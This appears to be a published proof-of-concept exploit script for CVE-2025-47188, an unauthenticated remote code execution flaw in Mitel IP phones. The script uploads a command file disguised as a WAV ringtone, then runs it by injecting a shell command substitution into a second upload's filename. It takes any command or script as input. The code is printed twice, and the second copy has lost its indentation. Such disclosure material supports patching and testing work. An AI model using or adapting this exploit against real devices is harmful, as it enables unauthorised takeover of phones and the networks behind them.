InfoGuardLabs/CVE-2025-47188.py

## CVE-2025-47188.py
# Exploit Script for CVE-2025-47188
# https://labs.infoguard.ch/posts/cve-2025-47188_mitel_phone_unauthenticated_rce/
import argparse, requests, socket, sys

# Taken from: https://github.com/mathiasbynens/small/blob/master/wav.wav
WAF_FILE = b"RIFF$\0\0\0WAVEfmt \x10\0\0\0\x01\0\x01\0D\xac\0\0\x88X\x01\0\x02\0\x10\0data\0\0\0\0"


def exploit(target, command):
    target_ip = socket.gethostbyname(target)

    print(f"Starting exploit...")

    r = requests.post(
        f"http://{target_ip}:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0",
        files={
            "upload_ringtone/newfile": (
                f"commands.txt",
                WAF_FILE + b"\n" + command.encode("utf-8"),
            )
        },
    )
    if "ringtone.html" not in r.text or "success" not in r.text:
        print("Exploit failed uploading commands.txt")
        print(r.text)
        return

    r = requests.post(
        f"http://{target_ip}:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0",
        files={
            "upload_ringtone/newfile": (
                "fake$(sh ${HOME}userdata${HOME}ringtone${HOME}commands.txt).wav",
                b"This is an invalid WAV file",
            )
        },
    )
    if "ringtone.html" not in r.text:
        print("Exploit failed during command execution")
        print(r.text)
        return
    print("Exploit completed.")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("target", help="The target hostname or ip")
    parser.add_argument("-c", "--command", help="The command to run on the remote")
    parser.add_argument("-s", "--script", help="The script to run on the remote")
    args = parser.parse_args()

    if args.command and args.script:
        print("Can only use one of -c or -s")
        sys.exit(1)
    command = args.command
    if args.script:
        with open(args.script, "r") as f:
            command = f.read()

    if command is None or command.strip() == "":
        print("No command specified. Use either -c or -s.")
        sys.exit(1)

    exploit(args.target, command)
	# Exploit Script for CVE-2025-47188
	# https://labs.infoguard.ch/posts/cve-2025-47188_mitel_phone_unauthenticated_rce/
	import argparse, requests, socket, sys

	# Taken from: https://github.com/mathiasbynens/small/blob/master/wav.wav
	WAF_FILE = b"RIFF$\0\0\0WAVEfmt \x10\0\0\0\x01\0\x01\0D\xac\0\0\x88X\x01\0\x02\0\x10\0data\0\0\0\0"


	def exploit(target, command):
	target_ip = socket.gethostbyname(target)

	print(f"Starting exploit...")

	r = requests.post(
	f"http://{target_ip}:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0",
	files={
	"upload_ringtone/newfile": (
	f"commands.txt",
	WAF_FILE + b"\n" + command.encode("utf-8"),
	)
	},
	)
	if "ringtone.html" not in r.text or "success" not in r.text:
	print("Exploit failed uploading commands.txt")
	print(r.text)
	return

	r = requests.post(
	f"http://{target_ip}:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0",
	files={
	"upload_ringtone/newfile": (
	"fake$(sh ${HOME}userdata${HOME}ringtone${HOME}commands.txt).wav",
	b"This is an invalid WAV file",
	)
	},
	)
	if "ringtone.html" not in r.text:
	print("Exploit failed during command execution")
	print(r.text)
	return
	print("Exploit completed.")


	if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	parser.add_argument("target", help="The target hostname or ip")
	parser.add_argument("-c", "--command", help="The command to run on the remote")
	parser.add_argument("-s", "--script", help="The script to run on the remote")
	args = parser.parse_args()

	if args.command and args.script:
	print("Can only use one of -c or -s")
	sys.exit(1)
	command = args.command
	if args.script:
	with open(args.script, "r") as f:
	command = f.read()

	if command is None or command.strip() == "":
	print("No command specified. Use either -c or -s.")
	sys.exit(1)

	exploit(args.target, command)